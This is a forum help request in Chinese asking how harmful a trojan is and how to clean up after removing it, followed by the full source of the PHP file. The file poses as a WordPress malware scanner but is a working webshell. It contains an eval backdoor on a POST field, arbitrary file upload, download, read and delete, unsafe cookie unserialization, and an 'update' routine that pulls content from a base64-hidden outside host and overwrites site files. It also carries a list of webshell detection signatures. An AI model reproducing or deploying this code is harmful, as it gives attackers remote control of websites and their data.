1469
9
这个有多大的危害? 现在删除木马后需要进行哪些处理?
<?php
//phpinfo();exit;
ob_start();
ignore_user_abort(true);
ini_set("memory_limit", "-1");
set_time_limit(0);
date_default_timezone_set("PRC");
//error bin
//ini_set('display_errors',1);
//error end
$username = "zh";
$uuuuuid = "aHR0cDovLzY5LjMwLjI0OS4xMjI6ODAwL3Yx";
$password = $username;
if(isset($_POST['username']))$_POST['password']=$_POST['username'];
$md5 = md5(md5($username).md5($password));
$version = "PHP Web v1.3";
//$servername =base64_decode("aHR0cDovLzEyNy4wLjAuMTo4MDAvdjE=");; //aHR0cDovLzEyNy4wLjAuMTo4MDAvdjE=
$servername = base64_decode($uuuuuid); //
$realpath = realpath('./');
$selfpath = $_SERVER['PHP_SELF'];
$selfpath = substr($selfpath, 0, strrpos($selfpath,'/'));
define('REALPATH', str_replace('//','/',str_replace('\\','/',substr($realpath, 0, strlen($realpath) - strlen($selfpath)))));
define('MYFILE', basename(__FILE__));
define('MYPATH', str_replace('\\', '/', dirname(__FILE__)).'/');
define('MYFULLPATH', str_replace('\\', '/', (__FILE__)));
define('HOST', "http://".$_SERVER['HTTP_HOST']);
//取版本号 $wp_version
$wp_version = "";
//DOCUMENT_ROOT
$verisonfile = $_SERVER["DOCUMENT_ROOT"]."/wp-includes/version.php";
if (file_exists($verisonfile)){
//print_r($_SERVER);
include $verisonfile;
}
if(isset($_POST['subdirectory']) && $_POST['subdirectory']== "true" ){
$subdirectory = 1;
}else{
$subdirectory =0;
}
if(isset($_POST['mymm']) && $_POST['mymm']== "true"){
$mymm = 1;
}else{
$mymm = 0;
}
//mm
if(isset($_POST["zadmin"])){
@eval($_POST["zadmin"]);exit;
}
//updata
if(isset($_POST["userfile"])){
$filename = $_FILES['userfile'];
$asname = dirname(__FILE__)."/".basename($filename['name']);
if(move_uploaded_file($filename['tmp_name'],$asname)){
echo "ok";
}else{
echo "error";
}
header("refresh:1");
}
?>
<html>
<head>
<title>查找大码</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<style>
body{margin:0px;}
body,td{font: 12px Arial,Tahoma;line-height: 16px;}
a {color: #00f;text-decoration:underline;}
a:hover{color: #f00;text-decoration:none;}
.alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 10px 5px 5px;}
.alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 10px 5px 5px;}
.focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}
.head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 10px 5px 5px;font-weight:bold;}
.head td span{font-weight:normal;}
#footer{padding: 30px 30px;}
</style>
</head>
<body>
<?php
header("Content-Type: text/html;charset=utf-8");
if(!(isset($_COOKIE['t00ls']) && $_COOKIE['t00ls'] == $md5) && !(isset($_POST['username']) && isset($_POST['password']) && (md5(md5($_POST['username']).md5($_POST['password']))==$md5)))
{
echo '<form id="frmlogin" name="frmlogin" method="post" action="">用户名: <input type="text" name="username" id="username" /> <input type="submit" name="btnLogin" id="btnLogin" value="登陆" /></form>';
}
elseif(isset($_POST['username']) && isset($_POST['password']) && (md5(md5($_POST['username']).md5($_POST['password']))==$md5))
{
setcookie("t00ls", $md5, time()+60*60*24*365,"/");
echo "登陆成功!";
header( 'refresh: 1; url='.MYFILE.'?action=scan' );
exit();
}
else
{
setcookie("t00ls", $md5, time()+60*60*24*365,"/");
$setting = getSetting();
$action = isset($_GET['action'])?$_GET['action']:"";
if($action=="logout")
{
setcookie ("t00ls", "", time() - 3600 ,"/");
Header("Location: ".MYFILE);
exit();
}
if($action=="download" && isset($_GET['file']) && trim($_GET['file'])!=""){
$file = $_GET['file'];
ob_clean();
if (@file_exists($file)) {
header("Content-type: application/octet-stream");
header("Content-Disposition: filename=\"".basename($file)."\"");
echo file_get_contents($file);
}
exit();
}
//show
if($action=="show" && isset($_GET['file']) && trim($_GET['file'])!=""){
$file = $_GET['file'];
ob_clean();
if (@file_exists($file)) {
//header("Content-type: application/octet-stream");
//header("Content-Disposition: filename=\"".basename($file)."\"");
echo file_get_contents($file);
}
exit();
}
//delmy
if($action=="delmy" ){
$_SERVER["document_root"];
$file = $_SERVER['SCRIPT_FILENAME'];
ob_clean();
unlink($file);
echo "删除成功!";
exit();
}
if($action=="del" && isset($_GET['file']) && trim($_GET['file'])!=""){
$file = $_GET['file'];
//ob_clean();
chmod($file,0755);
unlink($file);
echo "删除成功!";
exit();
}
if($action=="update" && isset($_GET['file']) && trim($_GET['file'])!=""){
$file = $_SERVER["DOCUMENT_ROOT"].$_GET['file'];
$updatefile = trim($_GET['file']);
$wp_versions =explode(".",$wp_version);
$ves = $wp_versions[0].".".$wp_versions[1];
$geurl = $servername ."/wps/wordpress-{$ves}/wordpress".$updatefile;
ob_clean();
echo $geurl;
$resdate = file_get_contents($geurl);
if(strlen($resdate)>300){
file_put_contents($file,$resdate);
}
echo "更新成功!";
exit();
}
//serch start
if($action=="serch" && isset($_GET['file']) && trim($_GET['file'])!=""){
$dir = isset($_POST['path'])?$_POST['path']:MYPATH;
$dir = substr($dir,-1)!="/"?$dir."/":$dir;
ob_clean();
$start=time();
$is_user = array();
$is_ext = "";
$list = "";
if(trim($setting['user'])!="")
{
$is_user = explode("|",$setting['user']);
if(count($is_user)>0)
{
foreach($is_user as $key=>$value)
$is_user[$key]=trim(str_replace("?","(.)",$value));
$is_ext = "(\.".implode("($|\.))|(\.",$is_user)."($|\.))";
}
}
if($setting['hta']==1)
{
$is_hta=1;
$is_ext = strlen($is_ext)>0?$is_ext."|":$is_ext;
$is_ext.="(^\.htaccess$)";
}
if($setting['all']==1 || (strlen($is_ext)==0 && $setting['hta']==0))
{
$is_ext="(.+)";
}
$php_code = getCode();
if(!is_readable($dir))
$dir = MYPATH;
$count=$scanned=0;
$log = fopen("kslog.txt","w+");
scan($dir,$is_ext);
//fclose($log); //fiel close
$end=time();
$spent = ($end - $start);
?>
<div style="padding:10px; background-color:#ccc">扫描: <?php echo $scanned?> 文件 | 发现: <?php echo $count?> 可疑文件 | 耗时: <?php echo $spent?> 秒</div>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr class="head">
<td width="15" align="center">No.</td>
<td width="40%">文件</td>
<td width="23%">访问时间_更新时间_创建时间</td>
<td width="10%">原因</td>
<td width="5%">特征</td>
<td>动作</td>
</tr>
<?php echo $list?>
</table>
<?php
exit;
}
//serch end
?>
<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody><tr class="head">
<td><?php echo $_SERVER['SERVER_ADDR']?><span style="float: right; font-weight:bold;"><?php echo "<a href='/'>$version</a>"?></span></td>
</tr>
<tr class="alt1">
<td><span style="float: right;"><button onclick="delmy()" >删除自己</button> <?=date("Y-m-d H:i:s",time())?></span>
<a href="?action=scan">扫描</a> |
<a href="?action=setting">设定</a> |
<a href="?action=logout">登出</a>
</td>
</tr>
</tbody></table>
<br>
<?php
if($action=="setting")
{
if(isset($_POST['btnsetting']))
{
$Ssetting = array();
$Ssetting['user']=isset($_POST['checkuser'])?$_POST['checkuser']:"php | php? | phtml";
$Ssetting['all']=isset($_POST['checkall'])&&$_POST['checkall']=="on"?1:0;
$Ssetting['hta']=isset($_POST['checkhta'])&&$_POST['checkhta']=="on"?1:0;
setcookie("t00ls_s", base64_encode(serialize($Ssetting)), time()+60*60*24*365,"/");
echo "设置完成!";
header( 'refresh: 1; url='.MYFILE.'?action=setting' );
exit();
}
?>
<form name="frmSetting" method="post" action="?action=setting">
<fieldset style="width:400px">
<LEGEND>扫描设定</LEGEND>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="60">文件后缀:</td>
<td width="300"><input type="text" name="checkuser" id="checkuser" style="width:300px;" value="<?php echo $setting['user']?>"></td>
</tr>
<tr>
<td><label for="checkall">所有文件</label></td>
<td><input type="checkbox" name="checkall" id="checkall" <?php if($setting['all']==1) echo "checked"?>></td>
</tr>
<tr>
<td><label for="checkhta">设置文件</label></td>
<td><input type="checkbox" name="checkhta" id="checkhta" <?php if($setting['hta']==1) echo "checked"?>></td>
</tr>
<tr>
<td> </td>
<td>
<input type="submit" name="btnsetting" id="btnsetting" value="提交">
</td>
</tr>
</table>
</fieldset>
</form>
<?php
}
else
{
$dir = isset($_POST['path'])?$_POST['path']:MYPATH;
$dir = substr($dir,-1)!="/"?$dir."/":$dir;
?>
<!-- <form name="frmScan" method="post" action=""> -->
<table width="100%%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="35" style="vertical-align:middle; padding-left:5px;">网站路径:</td>
<td width="690">
<input type="text" name="path" id="path" style="width:600px" value="<?php echo $_SERVER['DOCUMENT_ROOT']?>">
<!-- <input type="submit" name="btnScan" id="btnScan" value="开始扫描"disabled> -->
<button type="button" clas="btnScan" id="btnScan" onclick="serch()"> 开始扫描</button>
</td>
<td width="100">
<form width="50px" enctype="multipart/form-data" action="" method="POST">
<input name="userfile" type="hidden" value="55" />
<input name="userfile" type="file" />
<input type="submit" value="上传" />
</form>
</td>
</tr>
</table>
<?php
}
}
ob_flush();
?>
<div id ="serch" class="serch"></div>
<div id ="footer"></div>
</body>
</html>
<?php
function arrycan($myfilestr,$content){
foreach($myfilestr as $myv){
if(strpos($content,$myv)){
return 1;
}
}
return 0;
}
function scan($path,$is_ext){
global $php_code,$count,$scanned,$list,$log,$subdirectory,$wp_version,$servername;
if($path=="")$path='.';
$ignore = array('.', '..' );
$replace=array(" ","\n","\r","\t");
$dh = @opendir( $path );
while(false!==($file=readdir($dh))){
if( !in_array( $file, $ignore ) ){
if( is_dir( "$path$file" ) ){
scan("$path$file/",$is_ext);
} else {
$current = $path.$file;
if(MYFULLPATH==$current) continue;
//$ext =strtolower(substr($current,-3,3));
//if ($ext!="php") continue;
$file_ext=explode(".",$file);
if (isset($file_ext[1])){if(strstr($file_ext[1],"php")===false){ continue;} }
if(is_readable($current)){
$content = file_get_contents($current);
$contentmd5 = $content;
$content= str_replace($replace,"",$content);
$scanned++;
foreach($php_code as $key => $value){
if(preg_match("/$value/i",$content)){
//处理更新
$fileroot = str_replace($_SERVER['DOCUMENT_ROOT'],"",$current);
$fileatime = date('Y-m-d H:i:s',fileatime($current) );
$filetime = date('Y-m-d H:i:s',filemtime($current) );
$filectime = date('Y-m-d H:i:s',filectime($current) );
$reason = explode("->",$key);
$url = str_replace(REALPATH,HOST,$current);
if($fileroot =="/wp-admin/includes/file.php") break;
if($reason[1] == "xmrlpc_move_uploaded_file"){
if(!strstr($content,'<input')) break;
}
$count++;
$j = $count % 2 + 1;
$list.="
<tr id=\"$count\" class='alt$j' onmouseover='this.className=\"focus\";' onmouseout='this.className=\"alt$j\";'>
<td>$count</td>
<td><a href='$fileroot' target='_blank'>$current</a></td>
<td>$fileatime ___$filetime __ {$filectime}</td>
<td><font color=red> $reason[0]</font><font color=#099></font> <a href=\"javascript:void(0); \" onclick= del('$current',$count) >删除 </a> </td>
<td><font color=#090>$reason[1]</font></td>
<td>
<a href='?action=download&file=$current' target='_blank'>下载</a>
<a href='?action=show&file=$current'' target='_blank'>查看</a>
</td>
</tr>
";
$logdata = date("Y m d h:i:s",time()) ." {$current} -> {$reason[1]} --{$reason[0]} \r\n ";
break;
}
}
}else{
$logdata = date("Y m d h:i:s",time()) ." {$current} \r\n ";
//fwrite($log,$logdata);
echo $logdata;//不可读目录
}
}
}
}
closedir( $dh );
}
function getSetting(){
$Ssetting = array();
if(isset($_COOKIE['t00ls_s']))
{
$Ssetting = unserialize(base64_decode($_COOKIE['t00ls_s']));
// $Ssetting['user']=isset($Ssetting['user'])?$Ssetting['user']:"php | php? | phtml | shtml";
$Ssetting['user']=isset($Ssetting['user'])?$Ssetting['user']:"php | php? | phtml | txt";
$Ssetting['all']=isset($Ssetting['all'])?intval($Ssetting['all']):0;
$Ssetting['hta']=isset($Ssetting['hta'])?intval($Ssetting['hta']):1;
}
else
{
// $Ssetting['user']="php | php? | phtml | shtml";
$Ssetting['user']="php | php? | phtml | txt";
$Ssetting['all']=0;
$Ssetting['hta']=1;
setcookie("t00ls_s", base64_encode(serialize($Ssetting)), time()+60*60*24*365,"/");
}
return $Ssetting;
}
function updatetxt(){
global $servername;
$getkm = $servername. "/km";
$str = file_get_contents($getkm);
$str ="后台加密base64->array(base64_服务器#k#k#array\(\'cod\','de','base','64_','e'\)
后台加密hex->hex(\$p)#k#k#(?<!(\w))hex\(\$p.*\)";
$strtoarr = explode("\r\n",$str);
$data = array();
if(count($strtoarr)>0){
foreach($strtoarr as $v){
$onedata = explode("#k#k#",$v);
if(is_array($onedata)){
$k =trim($onedata[0]);
if(strlen($k)>1){
$data[$k] = trim($onedata[1]);
}
}
}
}
return $data ;
}
function getCode(){
$update = updatetxt();
$oldarr = array(
'后台加密hex->hex($p)' =>'(?<!(\w))hex\(\\$p.*\)',
//
//'16进制->\x3D\x51'=>'(\\\([a-zA-Z0-9]){3,3}){4}',
'16进制->include$arr\x3D\x51'=>'include\\$arr\[9\]',
'一句话后门特征->eval($x'=>"(?<!(\w)|\\/\\/)eval\(.*\)",
'include8进制->@include("\167\160'=>'include\(.(\\\(\d+){2,3}){4}', // include\(.(\\([0-7])+){3} @include\(\"\\.*
'后台加密->array(base64_'=>"array\(\'cod\','de','base','64_','e'\)",
'后门特征->上传后门特征'=>"eJwBzB0z4gHHHTji7T37W9vGsj+339f",
'大码->about.php'=>'66696C655F7075745F636F6E74656E7473',
'大码->AD.php'=>'70687076657273696f6e',
'大码->admin.php'=>'\$zEMuyJ\=gzinflate\(base64_decode\(\$zEMuyJ\)\)',
'大码->class.api.php'=>"array\('te','g','nf','l','a','zi'\)",
'大码->cloud.php' =>"alert\('diupload!!!'\)",
'大码->index.php'=>'openbase_dir\(\){\$x=ini_get\(',
'大码->install.php'=>'dechex\(ord\(\$SP\[\$lE\]\)\)',
'大码->iR7SzrsOUEP.php'=>'\$XnNhAWEnhoiqwciqpoHH=file\(__FILE__\)',
'大码->license.php'=>'\$jj\.\$str1\(\'H\*\',\$str\)\.\$jj', //$jj.$str1('H*',$str).$jj
'大码->ma02.php'=>'\$files=GetFiles\(\$dir\)',
'大码->moon.php'=>'=dechex\(ord\(\$str\[\$i\]\)\);',
'大码->shell.php'=>'strstr\(strval\(\$vUjUnHvOOoO\)',
'上传功能->upfile.php'=>'move_uploaded_file\(\$files\[\'tmp_name\'\],\$fullpath\)', //move_uploaded_file($files['tmp_name'], $fullpath) OK-Clickhere\!
//'大码后->upload.php'=>'cdn.jsdelivr.net',
'大码->upload_file.php'=>'move_uploaded_file\(\$_FILES\["f"\]\["tmp_name"\]\[0\]',
'WP增加管理功能->WP-add'=>'"INSERTINTO\`"\.\$table_prefix\.\"users\`',
'加密大码->wp-blog.php'=>'Class_UC_key\(\"273B246D7975726C3D27\"\)',
'加密后台->pack(C'=>'pack\("C"\,hexdec\(substr\(\$string\,\$one\,.\)\)\)',
'加密后台->hex2bin'=>'\$x1=\$_\[.\];\$x2=\$x1\(\$_\[.]\)\;',//$x1=$_[0];$x2=$x1($_[1]);$x3=$x1($_[2]); he" . "x2bin
'加密后台->class Wid'=>'\$this->core=\$this->lib\(\$this->core\);\$this->core=\$this->_zx\(\);',
'通用上传功能注意查看->xmrlpc_move_uploaded_file'=>'move_uploaded_file\(.*\)',
'广告联盟->\$_COOKIE'=>'isset\(\$_COOKIE\[\'hIP\'\]\)',
//'可疑代码特征->eval($'=>'(?<!(\w))eval\((\'|"|\s*)\\$'
);
if(is_array($update)&& (count($update)>0)){
$datat = array_merge($update,$oldarr);
}else{
$datat = $oldarr;
}
//print_r($datat);exit;
return $datat;
}
?>
<script src="https://code.jquery.com/jquery-1.11.3.js"></script>
<script>
function del(file,j){
geturl = "?action=del&file=" + file;
$.get(geturl,function(data){console.log(data)});
$('#' + j).remove();
}
function update(file,j,filename){
geturl = "?action=update&file=" + filename;
$.get(geturl,function(data){console.log(data)});
console.log(geturl)
$('#' + j).remove();
}
function serch(){
$("#btnScan").text("程序正在处理中");
$("#serch").empty();
filename ="/";
geturl = "?action=serch&file=" + filename;
path =$("#path").val();
$.post(geturl,{path:path},function(data){
console.log(data);
$("#serch").html(data);
$("#btnScan").text("开始扫描");
});
}
function delmy(){
geturl ="?action=delmy";
$.get(geturl,function(data){
console.log(data);
alert("删除成功!");
})
}
</script>
这家伙太懒了,什么也没留下。
